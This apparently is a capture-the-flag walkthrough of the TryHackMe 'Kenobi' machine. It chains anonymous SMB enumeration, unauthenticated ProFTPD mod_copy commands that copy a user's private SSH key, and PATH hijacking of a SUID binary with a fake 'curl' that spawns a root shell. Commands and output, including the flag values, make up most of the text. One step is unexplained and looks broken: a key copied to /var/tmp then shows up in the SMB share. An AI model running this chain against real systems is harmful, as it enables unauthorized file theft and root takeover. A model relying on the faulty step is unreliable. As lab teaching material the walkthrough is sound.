THM Kenobi Walkthrough — Samba Shares, ProFTPD, and Path Exploitation

Introduction

Kenobi is a TryHackMe room released in 2021 that walks through a classic Linux exploitation chain: enumerate SMB shares, use an FTP vulnerability to read private files, and leverage a misconfigured binary to escalate privileges via path hijacking.

What makes Kenobi a good learning box is that it connects three distinct techniques into a single chain — you need all three to get root. It's easy, but it's not handed to you. You have to connect the dots.

"Kenobi teaches one thing better than most boxes: chaining. A single vulnerability gets you a foothold. Connecting multiple weaknesses is how you get root."

Machine Info

• Platform: TryHackMe
• Room: Kenobi
• OS: Linux (Ubuntu)
• Difficulty: Easy
• Released: 2021
• Target IP: 10.10.19.233 (varies per session)

Step 1: Enumeration

Start with nmap:

nmap -sC -sV -oN kenobi.nmap 10.10.19.233

PORT     STATE    SERVICE     VERSION
21/tcp   open     ftp         ProFTPD 1.3.5
22/tcp   open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7
80/tcp   open     http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 4.3.11-Ubuntu

Four services: FTP on 21, SSH on 22, HTTP on 80, SMB on 139/445.

SMB Enumeration

Let's enumerate the Samba shares:

smbclient -L //10.10.19.233 -N

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
anonymous       Disk      (empty)
IPC$            IPC       IPC Service (kenobi server (Samba 4.3.11-Ubuntu))

There's an anonymous share accessible without credentials:

smbclient //10.10.19.233/anonymous -N

smb: \> ls
  .                                   D        0  Tue Apr 20 13:26:10 2021
  ..                                  D        0  Tue Apr 20 12:20:56 2021
  log.txt                             N    12237  Tue Apr 20 13:26:10 2021

smb: \> get log.txt

Download and read log.txt:

cat log.txt

Generating key for rsa
...
# Information about the FTP server and Samba configuration

The log file contains FTP server information and mentions a user kenobi. It references the ProFTPD server running on port 21.

Step 2: ProFTPD Exploitation (CVE-2015-3306)

ProFTPD 1.3.5 has a known vulnerability — the mod_copy module allows copying files without authentication via the SITE CPFR and SITE CPTO commands:

# Connect to FTP
nc 10.10.19.233 21

220 ProFTPD 1.3.5 Server (ProFTPD Default Installation)

SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination destination

SITE CPTO /var/tmp/id_rsa
250 Copy successful

This copies Kenobi's private SSH key to /var/tmp/id_rsa, which we can access through the Samba share.

Accessing the Key via SMB

# Mount the anonymous share
mkdir /mnt/kenobi
mount -t cifs //10.10.19.233/anonymous /mnt/kenobi

# The copied file should be accessible through the share
ls /mnt/kenobi/
log.txt  id_rsa

cat /mnt/kenobi/id_rsa
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

SSH as Kenobi

chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.19.233

kenobi@kenobi:~$ id
uid=1000(kenobi) gid=1000(kenobi) groups=1000(kenobi)

We're in as kenobi.

User Flag

cat ~/user.txt

6472642b09b4c2441a7d1da23c7cb1c4

Step 3: Privilege Escalation

Now we need to go from kenobi to root. Let's enumerate:

find / -perm -4000 -type f 2>/dev/null

/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/at
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkitd
/usr/lib/eject/dmcrypt-get-device
/usr/bin/menu

There's a custom SUID binary: /usr/bin/menu. Let's examine it:

file /usr/bin/menu
/usr/bin/menu: ELF 64-bit LSB executable, x86-64

strings /usr/bin/menu
...
curl -I localhost
uname -r
ifconfig
...

The binary displays a simple menu with three options:

1. Status check (curl -I localhost)
2. Kernel version (uname -r)
3. Interface config (ifconfig)

Critical observation: it calls these commands using their short names (e.g., curl not /usr/bin/curl, uname not /usr/bin/uname). This means it relies on the PATH environment variable to resolve the executables.

Path Hijacking

Because the binary runs as root (SUID), any command it executes runs with root privileges. If we modify PATH to point to a directory we control, we can make it execute our own version of curl, uname, or ifconfig:

# Create a fake "curl" that gives us a shell
echo '/bin/bash' > /tmp/curl
chmod +x /tmp/curl

# Modify PATH to point to our fake binary first
export PATH=/tmp:$PATH

# Run the menu binary and select option 1
/usr/bin/menu

# It runs our fake curl, which spawns a root shell
id
uid=0(root) gid=0(root)

whoami
root

Root Flag

cat /root/root.txt

177f796f89f6007aa1344b6c82b32925

Step 4: Breaking Down the Privesc

The path hijacking technique works because:

1. The SUID binary inherits the user's environment (specifically PATH)
2. The binary uses relative paths for command execution (no absolute paths like /usr/bin/curl)
3. We control PATH and can ensure our malicious binary is found first

This is why the principle of least privilege applies to environment variables too. Any SUID binary that uses relative paths and inherits the user's PATH is vulnerable.

"Setuid binaries that call out to other executables with relative paths are a privilege escalation waiting to happen. Always check strings on SUID binaries for this pattern."

Summary of Full Exploitation Chain

| Step | Technique | Result | |------|-----------|--------| | 1 | SMB enumeration | Found anonymous share with log.txt | | 2 | ProFTPD mod_copy (CVE-2015-3306) | Copied kenobi's SSH key to accessible location | | 3 | SMB mount to retrieve the key | Obtained SSH access as kenobi | | 4 | SUID binary enumeration | Found /usr/bin/menu with relative paths | | 5 | PATH hijacking | Executed fake binary as root |

Lessons Learned

Kenobi reinforces three important lessons:

1. Don't ignore SMB on internal boxes — anonymous shares exist more often than you'd think, and they often contain useful information
2. Know your FTP exploits — ProFTPD's mod_copy is a niche but powerful technique when you need to move files between directories without authentication
3. ~strings~ on SUID binaries reveals paths — the moment you see a SUID binary calling external commands without absolute paths, you've found your privesc

This box is a great example of why Linux privilege escalation isn't always about kernel exploits. Sometimes it's about how a system administrator configured a binary six years ago and forgot about it.

Up next: Back to productivity territory with org-mode for developers.